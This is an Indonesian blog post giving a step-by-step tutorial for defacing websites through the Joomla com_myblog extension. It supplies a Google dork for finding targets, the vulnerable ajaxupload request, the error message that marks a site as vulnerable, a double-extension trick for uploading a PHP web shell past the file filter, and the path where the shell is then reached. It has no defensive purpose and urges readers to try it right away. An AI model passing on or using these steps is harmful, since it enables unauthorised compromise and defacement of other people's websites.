Deface dengan Joomla Com_Myblog Exploit

Oke kali ini saya mau share tutorial deface dengan Exploit com_myblog pada CMS Joomla. Exploitnya cukup mudah sehingga bisa langsung dipraktekkan.
Langsung saja
Google dork : inurl:/components/com_myblog/
Exploiter : download
Exploit : /index.php?option=com_myblog&task=ajaxupload

Jika kalian mendapat error

{error: ‘No file has been uploaded.’, msg: ” }

Tanda nya situsnya vuln.

Langsung eksekusi saja dengan exploiternya. Jalankan dengan xampp jika kalian menggunakan windows atau langsung buka di terminal jika di linux.
Untuk shell , supaya sukses upload dengan ekstensi php.xxxjpg / html.xxxjpg
Jika sukses maka akan ada notice seperti di screenshoot :

Shell akses :
localhost/images/shell.php.xxxjpg

Untuk yang kurang jelas bia lihat videonya disini :

Sekian tutor kali ini semoga bermanfaat.

Shares

3 Comments

Leave a Reply